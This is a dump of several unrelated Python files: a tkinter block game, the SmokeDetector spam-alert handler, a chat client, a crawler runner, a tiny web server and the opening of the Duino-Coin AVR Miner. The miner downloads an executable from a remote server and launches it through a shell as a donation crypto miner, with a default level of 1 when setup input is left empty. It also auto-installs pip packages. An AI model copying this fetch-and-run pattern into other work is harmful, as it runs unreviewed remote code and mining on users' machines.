self.CELL_SIZE-5,
text=str(self.board.score),
font=self.scorefont, anchor="n",
fill="white", tag="score")
self.text = self.canvas.create_text((BOARD_WIDTH + 3)*self.CELL_SIZE,
self.CELL_SIZE*3,
text="NEXT", font=self.font, anchor="n",
fill="white")
self.text = self.canvas.create_text((BOARD_WIDTH + 3)*self.CELL_SIZE,
self.CELL_SIZE*9,
text="BOMBS", font=self.font, anchor="n",
fill="white")
self.text = self.canvas.create_text((BOARD_WIDTH + 3)*self.CELL_SIZE,
self.CELL_SIZE*12,
text="DISCARDS", font=self.font, anchor="n",
fill="white")
def update_score(self):
if self.board.score == self.score:
return
self.score = self.board.score
self.canvas.itemconfig(self.scoretext, text=str(self.board.score))
self.master.title(f'Score: {self.board.score}')
def quit(self, event):
raise SystemExit
def draw_cell(self, x, y, color, shape):
if shape is Shape.B:
self.canvas.create_oval(
x * self.CELL_SIZE, y * self.CELL_SIZE,
(x+1) * self.CELL_SIZE, (y+1) * self.CELL_SIZE,
fill="white", tag="block")
else:
# tkinter's idea of green is rather dark
if color == 'green':
color = 'green2'
self.canvas.create_rectangle(
x * self.CELL_SIZE, y * self.CELL_SIZE,
(x+1) * self.CELL_SIZE, (y+1) * self.CELL_SIZE,
fill=color, outline="white", tag="block")
def draw_discard(self, x, y):
x = x * self.CELL_SIZE
y = y * self.CELL_SIZE
self.canvas.create_line(x, y, x+self.CELL_SIZE, y+self.CELL_SIZE,
fill="red", width=3, tag="discard")
self.canvas.create_line(x, y+self.CELL_SIZE, x+self.CELL_SIZE, y,
fill="red", width=3, tag="discard")
def update_discards(self):
if self.board.discards_remaining == self.discards:
# don't redraw if the discards are unchanged
return
self.discards = self.board.discards_remaining
self.canvas.delete("discard")
for i in range(self.board.discards_remaining):
self.draw_discard(BOARD_WIDTH + 0.25 + (i%5)*1.1,13+(i//5)*1.1)
def draw(self):
with self.board.lock:
self.canvas.delete("block")
self.update_score()
self.update_discards()
# Add the cells already on the board for drawing.
for (x, y) in self.board:
self.draw_cell(x, y, self.board.cellcolor[x, y], Shape.O)
if self.board.falling is not None:
# Add the cells of the falling block for drawing.
for (x, y) in self.board.falling:
self.draw_cell(x, y, self.board.falling.color,
self.board.falling.shape)
if self.board.next is not None:
# Add the cells of the next block for drawing.
width = self.board.next.right - self.board.next.left
for (x, y) in self.board.next:
self.draw_cell(x + BOARD_WIDTH + 2.5 - width/2, y+4,
self.board.next.color,
self.board.next.shape)
for i in range(self.board.bombs_remaining):
self.draw_cell(BOARD_WIDTH + 0.25 + i*1.1,10, "white", Shape.B)
x = BOARD_WIDTH * self.CELL_SIZE + 1
y = BOARD_HEIGHT * self.CELL_SIZE
self.canvas.create_line(x, 0, x, y, fill='blue')
self.after(DRAW_INTERVAL, self.draw)
class UserPlayer(Player):
has_move = None
target = None
next_move = None
def __init__(self, target):
self.has_move = Condition()
self.target = target
target.focus_set()
target.bind("<Up>", self.key)
target.bind("<Right>", self.key)
target.bind("<Down>", self.key)
target.bind("<Left>", self.key)
target.bind("<space>", self.key)
target.bind("z", self.key)
target.bind("x", self.key)
target.bind("b", self.key)
target.bind("d", self.key)
target.after(INTERVAL, self.drop)
def key(self, event):
with self.has_move:
if event.keysym == 'Up':
self.next_move = Rotation.Clockwise
elif event.keysym == 'Right':
self.next_move = Direction.Right
elif event.keysym == 'Down':
self.next_move = Direction.Down
elif event.keysym == 'Left':
self.next_move = Direction.Left
elif event.keysym == 'space':
self.next_move = Direction.Drop
elif event.keysym == 'z':
self.next_move = Rotation.Clockwise
elif event.keysym == 'x':
self.next_move = Rotation.Anticlockwise
elif event.keysym == 'b':
self.next_move = Action.Bomb
elif event.keysym == 'd':
self.next_move = Action.Discard
else:
return
self.has_move.notify()
def drop(self):
with self.has_move:
self.next_move = None
self.has_move.notify()
self.target.after(INTERVAL, self.drop)
def choose_action(self, board):
with self.has_move:
self.has_move.wait()
try:
return self.next_move
finally:
self.next_move = None
def run():
root = Tk()
# Try making window a dialog if the system allows it.
try:
root.attributes('-type', 'dialog')
except TclError:
pass
args = parser.parse_args()
if args.manual:
player = UserPlayer(root)
else:
player = SelectedPlayer()
adversary = RandomAdversary(DEFAULT_SEED, BLOCK_LIMIT)
board = Board(BOARD_WIDTH, BOARD_HEIGHT)
def runner():
try:
for move in board.run(player, adversary):
# When not playing manually, allow some time to see the move.
if not args.manual:
sleep(0.05)
except BlockLimitException:
print("Out of blocks")
print("Score=", board.score)
print("Press ESC in game window to exit")
Visual(board)
background = Thread(target=runner)
background.daemon = True
background.start()
root.mainloop()
raise SystemExit
if __name__ == '__main__':
run()
|
spamhandling.py
|
import json
import sys
import time
from threading import Thread
from findspam import FindSpam
from datahandling import *
from parsing import get_user_from_url, unescape_title,\
escape_special_chars_in_title, to_protocol_relative
from globalvars import GlobalVars
from datetime import datetime
from parsing import url_to_shortlink, user_url_to_shortlink
from metasmoke import Metasmoke
from deletionwatcher import DeletionWatcher
import excepthook
def should_whitelist_prevent_alert(user_url, reasons):
is_whitelisted = is_whitelisted_user(get_user_from_url(user_url))
if not is_whitelisted:
return False
reasons_comparison = [r for r in set(reasons) if "username" not in r]
return len(reasons_comparison) == 0
def check_if_spam(title, body, user_name, user_url, post_site, post_id, is_answer, body_is_summary, owner_rep, post_score):
if not body:
body = ""
test, why = FindSpam.test_post(title, body, user_name, post_site, is_answer, body_is_summary, owner_rep, post_score)
if is_blacklisted_user(get_user_from_url(user_url)):
test.append("blacklisted user")
blacklisted_user_data = get_blacklisted_user_data(get_user_from_url(user_url))
if len(blacklisted_user_data) > 1:
message_url = 'http:' + blacklisted_user_data[1]
blacklisted_post_url = blacklisted_user_data[2]
if blacklisted_post_url:
rel_url = blacklisted_post_url.replace("http:", "", 1)
why += u"\nBlacklisted user - blacklisted for {} (http://metasmoke.erwaysoftware.com/posts/by-url?url={}) by {}".format(blacklisted_post_url, rel_url, message_url)
else:
why += u"\n" + u"Blacklisted user - blacklisted by {}".format(message_url)
if 0 < len(test):
if has_already_been_posted(post_site, post_id, title) or is_false_positive((post_id, post_site)) \
or should_whitelist_prevent_alert(user_url, test) \
or is_ignored_post((post_id, post_site)) \
or is_auto_ignored_post((post_id, post_site)):
return False, None, "" # Don't repost. Reddit will hate you.
return True, test, why
return False, None, ""
def check_if_spam_json(json_data):
text_data = json.loads(json_data)["data"]
if text_data == "hb":
return False, None, ""
try:
data = json.loads(text_data)
except ValueError:
GlobalVars.charcoal_hq.send_message(u"Encountered ValueError parsing the following:\n{0}".format(json_data), False)
return False, None, ""
if "ownerUrl" not in data:
# owner's account doesn't exist anymore, no need to post it in chat:
# http://chat.stackexchange.com/transcript/message/18380776#18380776
return False, None, ""
title = data["titleEncodedFancy"]
title = unescape_title(title)
body = data["bodySummary"]
poster = data["ownerDisplayName"]
url = data["url"]
post_id = str(data["id"])
print time.strftime("%Y-%m-%d %H:%M:%S"), title.encode("ascii", errors="replace")
site = data["siteBaseHostAddress"]
site = site.encode("ascii", errors="replace")
sys.stdout.flush()
is_spam, reason, why = check_if_spam(title, body, poster, url, site, post_id, False, True, 1, 0)
return is_spam, reason, why
def handle_spam(title, body, poster, site, post_url, poster_url, post_id, reasons, is_answer, why="", owner_rep=None, post_score=None, up_vote_count=None, down_vote_count=None, question_id=None):
post_url = to_protocol_relative(url_to_shortlink(post_url))
poster_url = to_protocol_relative(user_url_to_shortlink(poster_url))
reason = ", ".join(reasons)
reason = reason[:1].upper() + reason[1:] # reason is capitalised, unlike the entries of reasons list
append_to_latest_questions(site, post_id, title if not is_answer else "")
if len(reasons) == 1 and ("all-caps title" in reasons or
"repeating characters in title" in reasons or
"repeating characters in body" in reasons or
"repeating characters in answer" in reasons or
"repeating words in title" in reasons or
"repeating words in body" in reasons or
"repeating words in answer" in reasons):
add_auto_ignored_post((post_id, site, datetime.now()))
if why is not None and why != "":
add_why(site, post_id, why)
if is_answer and question_id is not None:
add_post_site_id_link((post_id, site, "answer"), question_id)
try:
title = escape_special_chars_in_title(title)
if not poster.strip():
s = u"[ [SmokeDetector](//git.io/vgx7b) ] {}: [{}]({}) by a deleted user on `{}`" \
.format(reason, title.strip(), post_url, site)
username = ""
user_link = ""
else:
s = u"[ [SmokeDetector](//git.io/vgx7b) ] {}: [{}]({}) by [{}]({}) on `{}`" \
.format(reason, title.strip(), post_url, poster.strip(), poster_url, site)
username = poster.strip()
user_link = poster_url
t_metasmoke = Thread(target=Metasmoke.send_stats_on_post,
args=(title, post_url, reason.split(", "), body, username, user_link, why, owner_rep, post_score, up_vote_count, down_vote_count))
t_metasmoke.start()
print GlobalVars.parser.unescape(s).encode('ascii', errors='replace')
if time.time() >= GlobalVars.blockedTime["all"]:
append_to_latest_questions(site, post_id, title)
if reason not in GlobalVars.experimental_reasons:
metasmoke_link = u" [\u2026](//metasmoke.erwaysoftware.com/posts/by-url?url=" + post_url + ")"
if time.time() >= GlobalVars.blockedTime[GlobalVars.charcoal_room_id]:
chq_pings = get_user_names_on_notification_list("stackexchange.com", GlobalVars.charcoal_room_id, site, GlobalVars.wrap)
chq_msg = append_pings(s, chq_pings)
chq_msg_ms = chq_msg + metasmoke_link
GlobalVars.charcoal_hq.send_message(chq_msg_ms if len(chq_msg_ms) <= 500 else chq_msg if len(chq_msg) <= 500 else s[0:500])
if reason not in GlobalVars.non_tavern_reasons and site not in GlobalVars.non_tavern_sites and time.time() >= GlobalVars.blockedTime[GlobalVars.meta_tavern_room_id]:
tavern_pings = get_user_names_on_notification_list("meta.stackexchange.com", GlobalVars.meta_tavern_room_id, site, GlobalVars.wrapm)
tavern_msg = append_pings(s, tavern_pings)
tavern_msg_ms = tavern_msg + metasmoke_link
msg_to_send = tavern_msg_ms if len(tavern_msg_ms) <= 500 else tavern_msg if len(tavern_msg) <= 500 else s[0:500]
t_check_websocket = Thread(target=DeletionWatcher.post_message_if_not_deleted, args=((post_id, site, "answer" if is_answer else "question"), post_url, msg_to_send, GlobalVars.tavern_on_the_meta))
t_check_websocket.daemon = True
t_check_websocket.start()
if site == "stackoverflow.com" and reason not in GlobalVars.non_socvr_reasons and time.time() >= GlobalVars.blockedTime[GlobalVars.socvr_room_id]:
socvr_pings = get_user_names_on_notification_list("stackoverflow.com", GlobalVars.socvr_room_id, site, GlobalVars.wrapso)
socvr_msg = append_pings(s, socvr_pings)
socvr_msg_ms = socvr_msg + metasmoke_link
GlobalVars.socvr.send_message(socvr_msg_ms if len(socvr_msg_ms) <= 500 else socvr_msg if len(socvr_msg) <= 500 else s[0:500])
for specialroom in GlobalVars.specialrooms:
sites = specialroom["sites"]
if site in sites and reason not in specialroom["unwantedReasons"]:
room = specialroom["room"]
if room.id not in GlobalVars.blockedTime or time.time() >= GlobalVars.blockedTime[room.id]:
room_site = room._client.host
room_id = int(room.id)
room_pings = get_user_names_on_notification_list(room_site, room_id, site, room._client)
room_msg = append_pings(s, room_pings)
room_msg_ms = room_msg + metasmoke_link
specialroom["room"].send_message(room_msg_ms if len(room_msg_ms) <= 500 else room_msg if len(room_msg) <= 500 else s[0:500])
except:
exc_type, exc_obj, exc_tb = sys.exc_info()
excepthook.uncaught_exception(exc_type, exc_obj, exc_tb)
def handle_user_with_all_spam(user, why):
user_id = user[0]
site = user[1]
tab = "activity" if site == "stackexchange.com" else "topactivity"
s = "[ [SmokeDetector](//git.io/vgx7b) ] All of this user's posts are spam: [user {} on {}](//{}/users/{}?tab={})" \
.format(user_id, site, site, user_id, tab)
print GlobalVars.parser.unescape(s).encode('ascii', errors='replace')
add_why_allspam(user, why)
if time.time() >= GlobalVars.blockedTime[GlobalVars.meta_tavern_room_id]:
GlobalVars.tavern_on_the_meta.send_message(s)
if time.time() >= GlobalVars.blockedTime[GlobalVars.charcoal_room_id]:
GlobalVars.charcoal_hq.send_message(s)
if site == "stackoverflow.com" and time.time() >= GlobalVars.blockedTime[GlobalVars.socvr_room_id]:
GlobalVars.socvr.send_message(s)
for specialroom in GlobalVars.specialrooms:
room = specialroom["room"]
if site in specialroom["sites"] and (room.id not in GlobalVars.blockedTime or time.time() >= GlobalVars.blockedTime[room.id]):
room.send_message(s)
|
audioTNC.py
|
'''
Created on Sep 26, 2016
@author: matth
'''
#plan
# auto find com port (at least ask for port number)
# verify that port is good
# background thread the serial read
'''
import serial
import threading
from threading import Thread
from queue import Queue
import AFSK.afsk as afsk
class AudioTNC():
def __init__(self,portname,baud):
self.qin=Queue()
self.qout=Queue()
self.AudioReader=AudioThread(self.qin,self.qout,portname,baud)
self.threader = Thread(target=self.AudioReader.thread, args=())
def _handle_signal(self,signal, frame):
# mark the loop stopped
# cleanup
self.cleanup()
def cleanup(self):
print("cleaning up ...")
self.threading.ser.close()
def startAudioDat(self):
self.threader.start()
def stopAudioDat(self):
self.qin.put(False)
def transmitAudioDat(self,line):
self.qin.put(line.encode())
def getAudioDat(self):
if(self.qout.empty()==False):
return self.qout.get()
'''
# This is the thread that is created to handle the continuous loop for the serial data.
'''
class AudioThread(threading.Thread):
#serialListen(ser,x)
def __init__(self,qin,qout,portname,baud):
self.qin=qin
self.qout=qout
self.portname=portname
self.baud=baud
self.running=True
self.lines=""
self.newLine=False
def stopListening(self):
self.running=False
def thread(self):#this will need to be rewritten
x=0
print(self.portname)
print(self.baud)
audio = afsk.
self.serrunning=True
while self.running:
if self.qin.empty()==False:
self.line=self.qin.get()
if self.line==False:
self.running=False
break
ser.write(self.line)
if ser.in_waiting!=0:
x = ser.readline()
self.qout.empty()
self.qout.put(x)
print(x)
ser.close()
'''
|
runCrawler.py
|
#!/usr/bin/python3.6
# -*- coding: UTF-8 -*-
# @author: guichuan
from scrapy.utils.project import get_project_settings
import sys
path = r'/home/alex/桌面/Python/Project/Spider_Project/GubaCrawler'
sys.path.append(path)
from GubaCrawler.spiders.createEastMoneySpider import EastMoneySpider
from scrapy.crawler import CrawlerProcess
import os
import pandas as pd
import numpy as np
from multiprocessing import Process
stock_list_file_name = 'GubaCrawler/stock_lists/ZZ500.csv'
def get_stock_list():
spider_path = os.path.abspath(os.curdir)
df = pd.read_csv(os.path.join(spider_path, stock_list_file_name),
dtype={0: str, 1: str}, header=0)
stock_dictionary = dict(zip(df['ticker'].tolist(), df['display_name'].tolist()))
return stock_dictionary
def make_batches(size, batch_size):
nb_batch = int(np.ceil(size / float(batch_size)))
return [(i * batch_size, min(size, (i + 1) * batch_size)) for i in range(0, nb_batch)]
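# For example (illustrative only): make_batches(50, 25) -> [(0, 25), (25, 50)],
# i.e. half-open (start, end) index ranges covering `size` items.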
def spider_run(stock_list):
settings = get_project_settings()
process = CrawlerProcess(settings)
process.crawl(EastMoneySpider, stock_list=stock_list)
process.start()
if __name__ == "__main__":
stock_list = list(get_stock_list().keys())[200:250]
query_list = make_batches(50, 25)
for start, end in query_list:
stock_list_query = stock_list[start:end]
p = Process(target=spider_run, args=(stock_list_query,))
p.start()
|
client.py
|
import socket
import sys
import time
from tkinter import *
from threading import Thread
def showMultilineMsg(message_div, message_to_display): # displays multiline messages one line at a time as tkinter does not understand the line break \n symbol
message_div.insert(END, ' ')
for item in message_to_display.split('\n'):
message_div.insert(END, item)
time.sleep(0.1)
message_div.insert(END, ' ')
def sendMsg(user_msg, chat_window):
msg_got = user_msg.get()
if str(msg_got) == '/quit':
client_socket.close()
chat_window.quit()
else:
user_msg.set('')
try:
client_socket.sendall(str(msg_got).encode())
except:
closeWindow(user_msg, chat_window)
def receiveMsg(messages):
while True:
try:
            received_msg = client_socket.recv(1024).decode()
            if '<<Available commands>>' in received_msg or '<<Users>>' in received_msg:
                showMultilineMsg(messages, received_msg)
            else:
                messages.insert(END, received_msg)
except OSError as e:
error_code = e.args[0]
if error_code == 10053:
                print('Connection closed')
elif error_code == 10054:
messages.insert(END, 'Server has shut down - please close window or press <Send> to exit')
break
def closeWindow(user_msg, chat_window):
user_msg.set('/quit')
sendMsg(user_msg, chat_window)
def startClient():
username = ''
host = ''
port = ''
if len(sys.argv) != 4:
print('Insufficient connection information given, please try again!')
        while not username or not host or not port:
username = str(input('Username: '))
host = str(input('Host: '))
port = str(input('Port: '))
else:
username = sys.argv[1]
host = sys.argv[2]
port = sys.argv[3]
### Initialise chat window ###
chat_window = Tk()
chat_window.title('Chatroom')
frame = Frame(chat_window)
user_msg = StringVar()
user_msg.set('Enter message here')
scrollbar = Scrollbar(frame)
messages = Listbox(frame, height = 15, width = 100, yscrollcommand = scrollbar.set)
scrollbar.pack(side = RIGHT, fill = Y)
messages.pack(side = LEFT, fill = BOTH)
messages.pack()
frame.pack()
input_field = Entry(chat_window, text = user_msg)
input_field.bind("<Return>", lambda event : sendMsg(user_msg, chat_window)) # allows users to press "Enter" to send message
input_field.pack()
send_button = Button(chat_window, text = 'SEND', command = lambda : sendMsg(user_msg, chat_window)) # create button to invoke function to send message
send_button.pack()
chat_window.protocol('WM_DELETE_WINDOW', lambda : closeWindow(user_msg, chat_window)) # gets invoked when user closes chat window
##############################
try:
client_socket.connect((host, int(port)))
client_socket.sendall(username.encode())
except Exception as e:
print('Server not found due to error: ' + str(e))
messages.insert(END, 'Connection with server cannot be made. Hit <SEND> to close window.')
closeWindow(user_msg, chat_window)
try:
rcv_thread = Thread(target=receiveMsg, args=(messages, ))
rcv_thread.start()
chat_window.mainloop()
except KeyboardInterrupt:
print('KeyboardInterrupt - Force closing chat window')
client_socket.close()
chat_window.quit()
sys.exit(1)
if __name__ == '__main__':
client_socket = socket.socket()
startClient()
|
web_server.py
|
import functools
import logging
import random
import socketserver
import time
from multiprocessing.context import Process
from tradingkit.utils.request_handler import RequestHandler
class WebServer:
@staticmethod
def serve(routing: dict, open_browser=False, timeout=None, filename=''):
p = Process(target=WebServer.serve_and_browse, args=(routing, open_browser, filename, ))
p.start()
wait_for_server_seconds = timeout
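        # Note: timeout is used directly as a number of seconds below, so callers
        # are expected to pass a numeric value; the default of None would fail in
        # the "%d" log format and in time.sleep().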
logging.info("Waiting for server %d seconds" % wait_for_server_seconds)
time.sleep(wait_for_server_seconds)
p.terminate()
@staticmethod
def serve_and_browse(routing: dict, open_browser=False, filename=''):
handler = functools.partial(RequestHandler, routing)
port = random.randint(1024, 65535)
with socketserver.TCPServer(("", port), handler) as httpd:
if open_browser:
import webbrowser
webbrowser.open_new_tab('http://localhost:%d%s' % (port, filename))
print("serving at port", port)
httpd.serve_forever()
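# Hypothetical usage sketch (the routing dict format is assumed here, not taken
# from RequestHandler's actual contract):
#   WebServer.serve({'/report': 'report.html'}, open_browser=True, timeout=30)
# would serve on a random port for roughly 30 seconds and then terminate.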
|
AVR_Miner.py
|
#!/usr/bin/env python3
"""
Duino-Coin Official AVR Miner 2.74 © MIT licensed
https://duinocoin.com
https://github.com/revoxhere/duino-coin
Duino-Coin Team & Community 2019-2021
"""
from os import _exit, execl, mkdir
from os import name as osname
from os import path
from os import system as ossystem
from platform import machine as osprocessor
from platform import system
import sys
from configparser import ConfigParser
from pathlib import Path
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from re import sub
from socket import socket
from datetime import datetime
from statistics import mean
from signal import SIGINT, signal
from time import ctime, sleep, strptime, time
from random import choice
import select
import pip
from subprocess import DEVNULL, Popen, check_call, call
from threading import Thread
from threading import Lock as thread_lock
from threading import Semaphore
printlock = Semaphore(value=1)
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
call([sys.executable, __file__])
try:
from serial import Serial
import serial.tools.list_ports
except ModuleNotFoundError:
print("Pyserial is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pyserial")
install('pyserial')
try:
import requests
except ModuleNotFoundError:
print("Requests is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install requests")
install('requests')
try:
from colorama import Back, Fore, Style, init
init(autoreset=True)
except ModuleNotFoundError:
print("Colorama is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install colorama")
install("colorama")
try:
from pypresence import Presence
except ModuleNotFoundError:
print("Pypresence is not installed. "
+ "Miner will try to automatically install it "
+ "If it fails, please manually execute "
+ "python3 -m pip install pypresence")
install("pypresence")
def now():
return datetime.now()
def port_num(com):
return str(''.join(filter(str.isdigit, com)))
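# For example (illustrative): port_num("COM3") -> "3", port_num("/dev/ttyUSB0") -> "0".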
class Settings:
VER = '2.74'
SOC_TIMEOUT = 45
REPORT_TIME = 60
AVR_TIMEOUT = 4 # diff 6 * 100 / 196 h/s = 3.06
BAUDRATE = 115200
DATA_DIR = "Duino-Coin AVR Miner " + str(VER)
SEPARATOR = ","
ENCODING = "utf-8"
BLOCK = " ‖ "
PICK = ""
COG = " @"
if osname != "nt":
# Windows' cmd does not support emojis, shame!
PICK = " ⛏"
COG = " ⚙"
class Client:
"""
Class helping to organize socket connections
"""
def connect(pool: tuple):
s = socket()
s.settimeout(Settings.SOC_TIMEOUT)
s.connect((pool))
return s
def send(s, msg: str):
sent = s.sendall(str(msg).encode(Settings.ENCODING))
return True
def recv(s, limit: int = 128):
data = s.recv(limit).decode(Settings.ENCODING).rstrip("\n")
return data
def fetch_pool():
while True:
pretty_print("net0", " " + get_string("connection_search"),
"warning")
try:
response = requests.get(
"https://server.duinocoin.com/getPool").json()
if response["success"] == True:
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
debug_output(f"Fetched pool: {response['name']}")
return (NODE_ADDRESS, NODE_PORT)
elif "message" in response:
pretty_print(f"Warning: {response['message']}"
+ ", retrying in 15s", "warning", "net0")
sleep(15)
else:
raise Exception(
"no response - IP ban or connection error")
except Exception as e:
pretty_print("net0",
f"Error fetching mining node: {e}"
+ ", retrying in 15s", "error")
sleep(15)
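    # Typical flow, as a sketch based on the methods above (not taken from the
    # original sources): pool = Client.fetch_pool(); s = Client.connect(pool);
    # Client.send(s, "..."); reply = Client.recv(s). Note the methods are
    # written to be called on the class itself rather than on an instance.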
class Donate:
def load(donation_level):
if donation_level > 0:
if osname == 'nt':
if not Path(
f"{Settings.DATA_DIR}/Donate.exe").is_file():
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableWindows.exe')
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate.exe",
'wb') as f:
f.write(r.content)
elif osname == "posix":
if osprocessor() == "aarch64":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH64')
elif osprocessor() == "armv7l":
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableAARCH32')
else:
url = ('https://server.duinocoin.com/'
+ 'donations/DonateExecutableLinux')
if not Path(
f"{Settings.DATA_DIR}/Donate").is_file():
r = requests.get(url)
with open(f"{Settings.DATA_DIR}/Donate",
"wb") as f:
f.write(r.content)
def start(donation_level):
if osname == 'nt':
cmd = (f'cd "{Settings.DATA_DIR}" & Donate.exe '
+ '-o stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*5}')
elif osname == 'posix':
cmd = (f'cd "{Settings.DATA_DIR}" && chmod +x Donate '
+ '&& nice -20 ./Donate -o '
+ 'stratum+tcp://xmg.minerclaim.net:3333 '
+ f'-u revox.donate -p x -s 4 -e {donation_level*5}')
if donation_level <= 0:
pretty_print(
'sys0', Fore.YELLOW
+ get_string('free_network_warning').lstrip()
+ get_string('donate_warning').replace("\n", "\n\t\t")
+ Fore.GREEN + 'https://duinocoin.com/donate'
+ Fore.YELLOW + get_string('learn_more_donate'),
'warning')
sleep(5)
if donation_level > 0:
debug_output(get_string('starting_donation'))
donateExecutable = Popen(cmd, shell=True, stderr=DEVNULL)
pretty_print('sys0',
get_string('thanks_donation').replace("\n", "\n\t\t"),
'warning')
shares = [0, 0]
hashrate_mean = []
ping_mean = []
diff = 0
shuffle_ports = "y"
donator_running = False
job = ''
debug = 'n'
discord_presence = 'y'
rig_identifier = 'None'
donation_level = 0
hashrate = 0
config = ConfigParser()
mining_start_time = time()
if not path.exists(Settings.DATA_DIR):
mkdir(Settings.DATA_DIR)
if not Path(Settings.DATA_DIR + '/Translations.json').is_file():
url = ('https://raw.githubusercontent.com/'
+ 'revoxhere/'
+ 'duino-coin/master/Resources/'
+ 'AVR_Miner_langs.json')
r = requests.get(url)
with open(Settings.DATA_DIR + '/Translations.json', 'wb') as f:
f.write(r.content)
# Load language file
with open(Settings.DATA_DIR + '/Translations.json', 'r',
encoding='utf8') as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if system() == 'Darwin':
if getlocale()[0] is None:
setlocale(LC_ALL, 'en_US.UTF-8')
try:
if not Path(Settings.DATA_DIR + '/Settings.cfg').is_file():
locale = getdefaultlocale()[0]
if locale.startswith('es'):
lang = 'spanish'
elif locale.startswith('sk'):
lang = 'slovak'
elif locale.startswith('ru'):
lang = 'russian'
elif locale.startswith('pl'):
lang = 'polish'
elif locale.startswith('de'):
lang = 'german'
elif locale.startswith('fr'):
lang = 'french'
elif locale.startswith('tr'):
lang = 'turkish'
elif locale.startswith('it'):
lang = 'italian'
elif locale.startswith('pt'):
lang = 'portuguese'
elif locale.startswith('zh'):
lang = 'chinese_simplified'
elif locale.startswith('th'):
lang = 'thai'
elif locale.startswith('az'):
lang = 'azerbaijani'
elif locale.startswith('nl'):
lang = 'dutch'
else:
lang = 'english'
else:
try:
config.read(Settings.DATA_DIR + '/Settings.cfg')
lang = config["AVR Miner"]['language']
except Exception:
lang = 'english'
except:
lang = 'english'
def get_string(string_name: str):
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file['english']:
return lang_file['english'][string_name]
else:
return ' String not found: ' + string_name
def get_prefix(symbol: str,
val: float,
accuracy: int):
"""
H/s, 1000 => 1 kH/s
"""
if val >= 1_000_000_000_000: # Really?
val = str(round((val / 1_000_000_000_000), accuracy)) + " T"
elif val >= 1_000_000_000:
val = str(round((val / 1_000_000_000), accuracy)) + " G"
elif val >= 1_000_000:
val = str(round((val / 1_000_000), accuracy)) + " M"
elif val >= 1_000:
        val = str(round((val / 1_000), accuracy)) + " k"
else:
if symbol:
val = str(round(val)) + " "
else:
val = str(round(val))
return val + symbol
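# A few illustrative calls for get_prefix (sketch, not from the original source;
# values chosen to avoid rounding ambiguity):
#   get_prefix("H/s", 2_500_000, 2)  ->  "2.5 MH/s"
#   get_prefix("H/s", 950, 0)        ->  "950 H/s"
#   get_prefix("", 950, 0)           ->  "950"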
def debug_output(text: str):
if debug == 'y':
print(Style.RESET_ALL + Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S.%f ')
+ Style.NORMAL + f'DEBUG: {text}')
def title(title: str):
if osname == 'nt':
"""
Changing the title in Windows' cmd
is easy - just use the built-in
title command
"""
ossystem('title ' + title)
else:
"""
Most *nix terminals use
this escape sequence to change
the console window title
"""
print('\33]0;' + title + '\a', end='')
sys.stdout.flush()
def handler(signal_received, frame):
pretty_print(
'sys0', get_string('sigint_detected')
+ Style.NORMAL + Fore.RESET
+ get_string('goodbye'), 'warning')
_exit(0)
# Enable signal handler
signal(SIGINT, handler)
def load_config():
global username
global donation_level
global avrport
global hashrate_list
global debug
global rig_identifier
global discord_presence
global shuffle_ports
global SOC_TIMEOUT
if not Path(str(Settings.DATA_DIR) + '/Settings.cfg').is_file():
print(
Style.BRIGHT + get_string('basic_config_tool')
+ Settings.DATA_DIR
+ get_string('edit_config_file_warning'))
print(
Style.RESET_ALL + get_string('dont_have_account')
+ Fore.YELLOW + get_string('wallet') + Fore.RESET
+ get_string('register_warning'))
username = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_username')
+ Fore.RESET + Style.BRIGHT)
print(Style.RESET_ALL + Fore.YELLOW
+ get_string('ports_message'))
portlist = serial.tools.list_ports.comports(include_links=True)
for port in portlist:
print(Style.RESET_ALL
+ Style.BRIGHT + Fore.RESET
+ ' ' + str(port))
print(Style.RESET_ALL + Fore.YELLOW
+ get_string('ports_notice'))
port_names = []
for port in portlist:
port_names.append(port.device)
avrport = ''
while True:
current_port = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_avrport')
+ Fore.RESET + Style.BRIGHT)
if current_port in port_names:
avrport += current_port
confirmation = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_anotherport')
+ Fore.RESET + Style.BRIGHT)
if confirmation == 'y' or confirmation == 'Y':
avrport += ','
else:
break
else:
print(Style.RESET_ALL + Fore.RED
+ 'Please enter a valid COM port from the list above')
rig_identifier = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_rig_identifier')
+ Fore.RESET + Style.BRIGHT)
if rig_identifier == 'y' or rig_identifier == 'Y':
rig_identifier = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_rig_name')
+ Fore.RESET + Style.BRIGHT)
else:
rig_identifier = 'None'
donation_level = '0'
if osname == 'nt' or osname == 'posix':
donation_level = input(
Style.RESET_ALL + Fore.YELLOW
+ get_string('ask_donation_level')
+ Fore.RESET + Style.BRIGHT)
donation_level = sub(r'\D', '', donation_level)
if donation_level == '':
donation_level = 1
            if int(donation_level) > 5:
                donation_level = 5
            if int(donation_level) < 0:
                donation_level = 0
donation_level = int(donation_level)
config["AVR Miner"] = {
'username': username,
'avrport': avrport,
'donate': donation_level,
'language': lang,
'identifier': rig_identifier,
'debug': 'n',
"soc_timeout": 45,
"avr_timeout": 4,
"discord_presence": "y",
"periodic_report": 60,
"shuffle_ports": "y"}
with open(str(Settings.DATA_DIR)
+ '/Settings.cfg', 'w') as configfile:
config.write(configfile)
avrport = avrport.split(',')
print(Style.RESET_ALL + get_string('config_saved'))
hashrate_list = [0] * len(avrport)
else:
config.read(str(Settings.DATA_DIR) + '/Settings.cfg')
username = config["AVR Miner"]['username']
avrport = config["AVR Miner"]['avrport']
